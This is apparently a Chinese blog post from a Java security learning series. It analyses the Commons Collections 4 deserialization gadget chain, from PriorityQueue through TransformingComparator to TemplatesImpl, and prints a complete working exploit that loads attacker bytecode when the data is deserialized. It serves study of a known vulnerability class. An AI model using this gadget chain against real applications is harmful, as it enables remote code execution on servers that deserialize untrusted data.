CC4分析

已于 2022-10-28 10:36:31 修改
阅读量640 收藏
点赞数
分类专栏: Java学习 文章标签: java
于 2022-10-27 22:45:22 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61237064/article/details/127562385
版权

CC4

前言

CC更新了一个大的版本,今天讲的是更新后的。

链子流程

先来看看CC4大致的调用链流程图

其实后半段都和CC3差不多差不多,变的只是前面的入口,简单分析一下这条链子。

还是先看谁调用了ChainedTransformer的transform

在TransformingComparator的compare中调用了transform

继续往回找,非常多调用了conpare,还是需要对java比较了解的。这里不绕圈子了,实际上利用了PriorityQueue的readObject()

进入readObject中heapify(),存在siftDown()方法

进入siftDown()方法

再进入siftDownUsingComparator(),在此处调用了conpare,这就是入口到中间的链子

直接写我们的EXP

尝试执行,但无事发生.......在heapify()处设个断点调试

发现进入heapify后,此时size=0,计算一下size >>>1=0,也就是此时int i =-1。进不了for里面,也就执行不了我们的代码。

因为1>>>1也等于0,所以我们要增加队列为2.

尝试执行,但还是出现了错误......其实还是老问题,priorityQueue.add(2)的时候代码会在本地执行

而字节码加载的某个类只有在反序列化时才会自动加载进来,所以会报错,那这里就像URLDNS链一样解决就好了。

        Class transformingComparatorClass = transformingComparator.getClass();
        Field transformer = transformingComparatorClass.getDeclaredField("transformer");
        transformer.setAccessible(true);
        transformer.set(transformingComparator,chainedTransformer);

最终EXP

package org.example;

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;
import org.apache.commons.collections4.Transformer;
import org.apache.commons.collections4.comparators.TransformingComparator;
import org.apache.commons.collections4.functors.ChainedTransformer;
import org.apache.commons.collections4.functors.ConstantTransformer;
import org.apache.commons.collections4.functors.InstantiateTransformer;


import javax.xml.transform.Templates;
import java.io.*;
import java.lang.annotation.Target;
import java.lang.reflect.*;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.Base64;
import java.util.HashMap;
import java.util.Map;
import java.util.PriorityQueue;

// 主程序
public class poc {
    public static void main(String[] args) throws Exception{
        byte[] code = Files.readAllBytes(Paths.get("C:\\\\Users\\\\zhang\\\\IdeaProjects\\\\ajava\\\\target\\\\classes\\\\org\\\\example\\url.class"));
        TemplatesImpl obj = new TemplatesImpl();
        setFieldValue(obj, "_bytecodes", new byte[][] {code});
        setFieldValue(obj, "_name", "calc");
        Transformer[] transformers = new Transformer[] {
                new ConstantTransformer<>(TrAXFilter.class),
                new InstantiateTransformer<>(
                        new Class[] { Templates.class },
                        new Object[] { obj })
        };
        ChainedTransformer chainedTransformer = new ChainedTransformer<>(transformers);


        TransformingComparator transformingComparator = new TransformingComparator<>(new ConstantTransformer<>(1));
        PriorityQueue  priorityQueue = new PriorityQueue<>(transformingComparator);
        priorityQueue.add(1);
        priorityQueue.add(2);
        Class transformingComparatorClass = transformingComparator.getClass();
        Field transformer = transformingComparatorClass.getDeclaredField("transformer");
        transformer.setAccessible(true);
        transformer.set(transformingComparator,chainedTransformer);
        serialize(priorityQueue);
        unserialize("ser.bin");
    }


    //序列化数据
    public static void serialize(Object obj) throws IOException {
        ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("ser.bin"));
        oos.writeObject(obj);
    }

    //反序列化数据
    public static Object unserialize(String Filename) throws IOException, ClassNotFoundException{
        ObjectInputStream ois = new ObjectInputStream(new FileInputStream(Filename));
        Object obj = ois.readObject();
        return obj;
    }
    public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception{
        Field field = obj.getClass().getDeclaredField(fieldName);
        field.setAccessible(true);
        field.set(obj, value);
    }
}

剩下的大都差不多,感觉没意思就没写了。

ZredamanJ
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Java安全』反序列化-CC4反序列化漏洞POP链分析_ysoserial CommonsCollections4 PoC分析
Ho1aAs‘s Blog
03-12 988
文章目录前言代码复现工具类PoC代码审计 | 原理分析1. TrAXFilter构造器传入TemplatesImpl会调用newTransformer()2. InstantiateTransformer.transform()调用指定的类构造器3. TransformingComparator.compare()调用this.transformer.transform()4. PriorityQueue反序列化调用comparator.compare()POP链完 前言 同样的,CC4是CC2的变种,改变
10-java安全——java反序列化CC3和CC4链分析
网络安全
07-20 1968
漏洞分析环境: JDK1.7.0_80 apache commons collections-3.0 在maven项目中的pom文件中添加3.1版本的依赖 <dependency> <groupId>commons-collections</groupId> <artifactId>commons-collections</artifactId> <version>3.1</version
Java反序列化 CC4利用链记录
LTianHang的博客
02-07 225
Java反序列化 CC4利用链记录
CC链总结
王嘟嘟的博客
03-14 683
整理一下CC链相关的内容,单独存放,方便复习。
CC4 链表排序
Laoddaaa的博客
10-15 143
CC4 链表排序
cc2530协议栈分析
07-26
本文将深入探讨CC2530协议栈的结构、主要功能以及如何进行分析。 首先,我们需要理解协议栈的基本概念。协议栈是由一系列协议层组成的结构,每一层都负责特定的通信任务,如物理层处理信号传输,数据链路层处理错误...
compiler:CC4项目
07-14
CC4 项目 GitHub: : 变更日志: 02/11/2014 添加了 CodeGen 类 27/10/2014 修复了遍历 AST 而不是解析树的代码 20/10/2014 添加了 IRT 基类 13/10/2014 添加了更多 Decaf 语义规则 06/10/2014 添加了更多语义...
CC2530测心率
04-10
【CC2530测心率】:在物联网和无线通信领域,CC2530是一款广泛应用的微控制器,尤其在Zigbee网络中占据重要地位。TI(Texas Instruments)公司的CC2530集成了8位微处理器和2.4GHz的射频收发器,使得它成为低功耗、高...
cc2530实验4设计性实验代码
04-05
在本文中,我们将深入探讨基于CC2530微控制器的设计性实验,这是一颗广泛应用于无线传感器网络和...通过对`test4`文件的分析和修改,学生可以深入理解无线传感器网络的工作机制,并进一步提升编程和系统设计能力。
cc2530.pdf
02-07
- **IEEE 802.15.4 MAC 定时器与通用定时器**:CC2530提供了专门针对IEEE 802.15.4标准的MAC定时器,并且还配备了通用定时器,包括一个16位定时器和两个8位定时器。 - **RF/布局设计**: - **2.4GHz IEEE 802.15.4 ...
Java安全学习笔记--反序列化漏洞利用链CC4
m0_64685672的博客
01-20 1579
测试环境 jdk1.8(jdk8u71) Commons Collections4.0 基于cc2和cc3,由于TransformingComparator+priorityqueue是可以触发transforme()方法所以可以利用这个两个类的组合来代替cc3链中的LazyMap或Transformedmmap+AnnotationinvocationHandler的组合,从而构成了cc4。 恶意类 import com.sun.org.apache.xalan.int...
java cc链4
qq_54030686的博客
01-17 470
java cc链4
Java安全—CommonsCollections4
顶峰
01-09 1516
这次给大家带来的是CC4链的简单分析,可以看到CC4链还是没有脱离之前跟的链的影子,我们可以看到CC3的前半部分以及CC2的后半部分,需要注意的问题的话就是版本问题了吧还有上面提到的一些小细节,至此CC链就快跟完了。
12. Hibernate 模板设计模式
这是一个web全栈开发的博客,取其精华去其糟粕,争取让大家一看就懂,一学就会,一用就成~
07-22 1260
如何运用模板设计模式重构 Hibernate 操作流程;持久化对象与序列化接口;OOP中有一个编码原则 :写仅写一次。翻译过来就是,不要重复,要重用。答案是:使用模板设计模式进一步封装Hibernate的操作。在真实项目中,Hibernate仅仅只是完成项目中的一部分工作,需要和其它,如Spring等框架联合工作,一起承担整体项目的开发。Spring框架中就提供的有Hibernate模板对象。一个常规的、频繁的操作代码中,大部分代码不需要变动,只有小部分代码需要根据需求变动。
golang 接口
m0_70982551的博客
07-24 807
接口定义了一组方法,这些方法没有具体的实现。接口类型的变量可以存储任何实现了这些方法的类型的值。// 更多方法...在Go语言中,接口值是指存储了实现某个接口的具体类型值的变量。接口值由两部分组成:1.动态类型:这是接口值当前存储的实际类型。2.动态值:这是实际存储的值,该值必须实现了接口中定义的所有方法。
Swagger使用Map接受参数时,页面如何显示具体参数及说
最新发布
a1058926697的博客
07-26 364
后端使用Map接受参数,要求在swagger页面上显示具体的参数名称、类型及说明。当Map接受参数数量少时,可以使用Swagger自带的注解。自定义注解 @ApiGlobalModel。编写处理注解对应的插件。
springboot之自动装配
weixin_50153914的博客
07-23 493
Spring Boot 通过一系列注解和条件配置实现了自动装配机制,使得开发者无需手动配置大量的 XML 文件或 Java 配置类。自动配置机制利用文件中的自动配置类,并结合条件注解和组件扫描,实现了灵活且强大的自动装配功能。这样,开发者可以专注于业务逻辑的实现,而无需处理繁琐的配置细节。
淘客返利系统中的服务发现与注册机制详解
技术研究中心
07-22 2393
通过服务注册中心,服务提供者可以将自己注册到注册中心,服务消费者可以从注册中心获取服务提供者的地址,以实现服务调用。本文详细介绍了淘客返利系统中服务发现与注册机制的实现,包括Eureka的配置与代码示例。通过Eureka,我们可以轻松实现服务的注册与发现,确保分布式系统中各个服务之间的通信。在本文中,我们将深入探讨淘客返利系统中的服务发现与注册机制,并结合Java代码进行详细讲解。在我们的淘客返利系统中,我们采用Eureka作为服务发现与注册的工具。在我们的淘客返利系统中,首先需要配置Eureka服务器。
prcc敏感性分析matlab
05-20
PRCC(Partial Rank Correlation Coefficient)敏感性分析是一种用于评估模型输入变量对输出变量的影响的方法。在MATLAB中,可以使用Sensitivity Analysis Toolbox中的函数进行PRCC敏感性分析。以下是PRCC敏感性分析...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值